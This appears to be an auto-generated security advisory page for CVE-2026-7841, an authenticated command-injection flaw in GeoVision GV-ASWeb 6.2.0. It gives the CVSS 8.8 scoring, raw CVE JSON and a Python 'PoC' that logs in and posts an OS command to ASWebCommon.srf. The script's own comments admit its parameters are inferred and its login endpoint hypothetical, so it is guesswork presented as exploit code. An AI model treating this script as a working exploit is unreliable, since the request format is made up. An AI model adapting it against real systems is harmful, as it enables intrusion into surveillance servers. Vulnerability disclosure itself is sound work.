Security Vulnerability Report
CVE-2026-7841 CVSS 8.8 HIGH

CVE-2026-7841

Published: 2026-05-06 08:16:04
Last Modified: 2026-05-07 15:15:07
Source: 0df08a0e-a200-4957-9bb0-084f562506f9

Description

A remote code execution vulnerability exists in Notification Settings on GeoVision GV-ASWeb 6.2.0. An authenticated user with System Setting permissions can execute arbitrary commands on the server by sending a crafted HTTP POST request to the ASWebCommon.srf backend endpoint to bypass the frontend restrictions.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

GeoVision GV-ASWeb 6.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2026-7841 PoC Concept
# Target: GeoVision GV-ASWeb 6.2.0
# Endpoint: ASWebCommon.srf

target = "http://target-ip/ASWebCommon.srf"
username = "admin"  # User with System Setting permissions
password = "password"

# The malicious command to execute (e.g., creating a test file)
# Payload syntax depends on the underlying OS (likely Windows/Linux based on product)
command = "whoami"

# Construct the malicious payload
# Parameters are inferred based on typical vuln patterns in this context
payload = {
    "setting_type": "notification",
    "command": command  # Vulnerable parameter
}

try:
    # 1. Authenticate (Hypothetical login endpoint)
    session = requests.Session()
    login_resp = session.post("http://target-ip/login.php", data={"user": username, "pass": password})
    if login_resp.status_code == 200:
        print("[+] Login successful")
        # 2. Send Exploit Request
        exploit_resp = session.post(target, data=payload)
        if exploit_resp.status_code == 200:
            print("[+] Exploit sent successfully")
            print("[+] Response:")
            print(exploit_resp.text)
        else:
            print("[-] Exploit request failed")
    else:
        print("[-] Login failed")
except Exception as e:
    print(f"[-] Error: {e}")

References

https://www.geovision.com.tw/cyber_security.php

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-7841", "sourceIdentifier": "0df08a0e-a200-4957-9bb0-084f562506f9", "published": "2026-05-06T08:16:04.490", "lastModified": "2026-05-07T15:15:06.770", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A remote code execution vulnerability\nexists in Notification Settings on GeoVision GV-ASWeb 6.2.0. An authenticated\nuser with System Setting permissions can execute arbitrary commands on the\nserver by sending a crafted HTTP POST request to the ASWebCommon.srf backend\nendpoint to bypass the frontend restrictions."}], "metrics": {"cvssMetricV31": [{"source": "0df08a0e-a200-4957-9bb0-084f562506f9", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "0df08a0e-a200-4957-9bb0-084f562506f9", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://www.geovision.com.tw/cyber_security.php", "source": "0df08a0e-a200-4957-9bb0-084f562506f9"}]}}